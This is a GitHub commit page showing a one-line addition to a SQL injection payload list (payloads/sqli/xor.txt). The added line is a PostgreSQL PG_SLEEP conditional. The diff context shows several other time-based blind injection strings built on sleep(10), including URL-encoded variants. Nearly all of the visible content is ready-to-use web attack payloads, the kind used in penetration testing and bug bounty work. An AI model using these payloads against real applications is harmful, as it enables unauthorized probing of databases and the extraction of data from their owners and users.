Skip to content

Commit

Permalink
Update xor.txt
Browse files Browse the repository at this point in the history
  • Loading branch information
coffinxp authored Nov 23, 2024
1 parent e7fb3d2 commit 9faf69f
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions payloads/sqli/xor.txt
Original file line number Diff line number Diff line change
Expand Up @@ -39,3 +39,4 @@ if(now()=sysdate(),sleep(10),0)
,(select * from (select(sleep(10)))a)
desc%2c(select*from(select(sleep(10)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(10))A))
'OR (CASE WHEN ((CLOCK_TIMESTAMP() - NOW()) < '0:0:10') THEN (SELECT '1'||PG_SLEEP(10)) ELSE '0' END)='1

0 comments on commit 9faf69f

Please sign in to comment.